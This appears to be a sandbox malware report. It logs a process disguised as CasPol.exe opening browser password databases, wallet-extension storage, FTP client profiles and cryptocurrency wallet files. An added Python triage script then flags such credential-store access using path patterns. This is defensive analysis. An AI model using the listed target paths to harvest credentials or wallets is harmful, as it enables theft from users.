Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
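
The file-access lines above all come from CasPol.exe, the .NET Framework Code Access Security Policy tool, which this report shows as the process opening Firefox and Chrome credential databases, per-extension storage for wallet extensions, FTP client profile directories and desktop wallet data. That mismatch between the accessing image and the store's owning application is the detection opportunity. The following is an added triage example, not part of the Joe Sandbox report: it parses lines in the report's own "Source: <image> File opened: <path>" form, classifies each path, and flags accesses by a process that should never read that store. The sample lines, the category patterns and the "owner" heuristic (a binary under the Windows directory, or any non-browser reading browser stores) are constructed assumptions for this example, not vendor rules.

```python
"""Added example: triage 'File opened' lines from a sandbox report for credential-store
access by an unexpected process. Sample lines and rules are constructed for the example."""
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Optional

# Constructed sample in the report's format: four accesses by CasPol.exe, one benign
# access by chrome.exe to its own Login Data, one unrelated framework config file.
SAMPLE_LINES = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
"""

LINE_RE = re.compile(r"^Source:\s+(?P<image>.+?)\s+File opened:\s+(?P<path>.+?)\s*$")


@dataclass(frozen=True)
class Rule:
    category: str
    pattern: re.Pattern
    expected_owners: frozenset  # lower-case image basenames that legitimately read this store


RULES = (
    # Chromium "Login Data*" SQLite DBs and Firefox logins.json / key4.db / places.sqlite.
    Rule("browser_credentials",
         re.compile(r"\\(Login Data( For Account)?|logins\.json|key4\.db|places\.sqlite)$", re.I),
         frozenset({"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"})),
    # Per-extension LevelDB under "Local Extension Settings\<id>"; wallet extensions keep
    # their encrypted vaults here. Chrome IDs are 32 letters a-p, but any name is accepted.
    Rule("browser_extension_storage",
         re.compile(r"\\Local Extension Settings\\[^\\]+$", re.I),
         frozenset({"chrome.exe", "msedge.exe", "brave.exe"})),
    # FTP client profile directories named in the report (saved site credentials).
    Rule("ftp_client_config",
         re.compile(r"\\(FTPbox|FTPGetter|FTPInfo|FTPRush|SmartFTP|3D-FTP)(\\|$)", re.I),
         frozenset()),
    # Desktop wallet data directories named in the report.
    Rule("desktop_wallet",
         re.compile(r"\\(Exodus|Ledger Live|atomic|Coinomi|Bitcoin|Binance|com\.liberty\.jaxx|"
                    r"Electrum(-LTC)?|Guarda)(\\|$)", re.I),
         frozenset()),
)


@dataclass(frozen=True)
class Finding:
    image: str
    path: str
    category: str
    suspicious: bool


def parse_line(line: str) -> Optional[tuple]:
    """Return (image, path) for a 'File opened' line, None for any other line."""
    m = LINE_RE.match(line.strip())
    return (m.group("image"), m.group("path")) if m else None


def classify(path: str) -> Optional[Rule]:
    """First rule whose pattern matches the opened path, or None."""
    return next((r for r in RULES if r.pattern.search(path)), None)


def is_unexpected_accessor(image: str, rule: Rule) -> bool:
    """Heuristic assumed by this example: anything living under the Windows directory
    (CasPol.exe and other framework/LOLBin images) has no reason to read user credential
    stores; for stores with known owners, any other image is suspicious as well."""
    p = PureWindowsPath(image)
    if len(p.parts) > 1 and p.parts[1].lower() == "windows":
        return True
    return bool(rule.expected_owners) and p.name.lower() not in rule.expected_owners


def triage(report_text: str) -> dict:
    """parse -> classify -> owner check for every line; summarise what was flagged."""
    findings = []
    for line in report_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        image, path = parsed
        rule = classify(path)
        if rule is not None:
            findings.append(Finding(image, path, rule.category, is_unexpected_accessor(image, rule)))
    flagged = [f for f in findings if f.suspicious]
    return {
        "findings": findings,
        "suspicious_by_category": Counter(f.category for f in flagged),
        "suspicious_processes": sorted({PureWindowsPath(f.image).name.lower() for f in flagged}),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for f in result["findings"]:
        print(f"{'SUSPICIOUS' if f.suspicious else 'ok':10} {f.category:26} "
              f"{PureWindowsPath(f.image).name} -> {f.path}")
    print(dict(result["suspicious_by_category"]), result["suspicious_processes"])
```

Fed the report's own lines instead of the constructed sample, the same pipeline collapses the long listing into one line per category with a single offending image, which is the shape an analyst wants when turning the report into a hunt query: a non-browser, non-wallet image touching these paths is the signal, independent of which stealer family produced it.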

Remote Access Functionality

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7404, type: MEMORYSTR